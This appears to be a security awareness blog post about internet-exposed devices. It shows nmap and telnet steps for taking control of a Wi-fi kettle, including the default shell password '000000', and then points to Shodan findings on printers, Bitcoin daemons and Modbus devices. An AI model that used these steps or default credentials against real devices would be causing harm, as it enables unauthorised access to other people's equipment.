Who Really Needs a Wi-fi Kettle?

Who Really Needs a Wi-fi Kettle?

Honestly. Who needs a Wi-fi Kettle? Who is so desperate for a cup of tea that they want to switch on their kettle on the way back home? Who can’t get off the couch, and switch the kettle on?

In the following example, I’ll show how easy it is to connect to a wi-fi kettle over a network connection. In this case, the wi-fi kettle has an IP address of 192.168.0.22. If we use nmap we see:

$ nmap 192.168.0.22
PORT   STATE SERVICE
23/tcp   open telnet
2000/tcp open cisco-sccp

We can then connect to port 2000:

$ telnet 192.168.0.22 2000
HELLOKETTLE
HELLOAPP

To switch the kettle on or off:

set sys output 0x4
set sys output 0x0

We can then connect to port 23 and enable the Web server. The password in the case is “000000”:

$ telnet 192.168.0.22 
AT+ Command Shell
Password: 000000
Login Successfully
AT+WEBS=1
AT+PMTF
AT+Z

But, surely no one would put their kettle on the Internet? Well with Shodan it’s not too difficult to find out, and where we can quickly scan for the iKettle protocol [here]:

Though, someone needs to tell them that their kettle is boiling (100 C).

But, you say …

That’s a kettle, surely my organisation wouldn’t have a kettle on-line!

But what about all those printer queues that are setup in your organisation, can they be seen? Well, currently, there’s over 175,000 of those queues ready to be connected to across the Internet:

and over 30,000 HP Laserjets just ready to be discovered:

But you say:

“At least my Bitcoins are safe!”

But are they? Shodan searches for information on the Bitcoin daemon, and any devices connected to it:

“But I feel safe that all our critical national infrastructure is secured and can’t be accessed by malicious agents”,

Well think again … the Modbus protocol allows devices to be controlled remotely. Here’s an example of a device in France:

And you say:

Well I’m off to get some fuel for my car, surely that’s secret!

Ooops:

And you say …

I’m switching off my Internet connection!